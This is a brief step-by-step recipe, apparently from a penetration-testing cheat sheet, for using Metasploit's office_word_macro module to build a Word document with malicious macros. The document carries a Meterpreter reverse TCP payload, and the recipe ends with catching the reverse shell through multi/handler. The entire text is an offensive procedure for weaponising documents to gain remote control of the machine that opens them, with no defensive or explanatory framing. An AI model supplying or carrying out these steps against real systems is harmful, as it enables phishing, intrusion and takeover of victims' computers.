Using Metasploit to create a document with malicious macros
- Launch Metasploit
- use exploit/multi/fileformat/office_word_macro
- set payload windows/meterpreter/reverse_tcp
- set LHOST (local IP)
- Set LPORT (any port you are going to connect back to)
- exploit
Catch the reverse shell
- Use the metasploit module multi/handler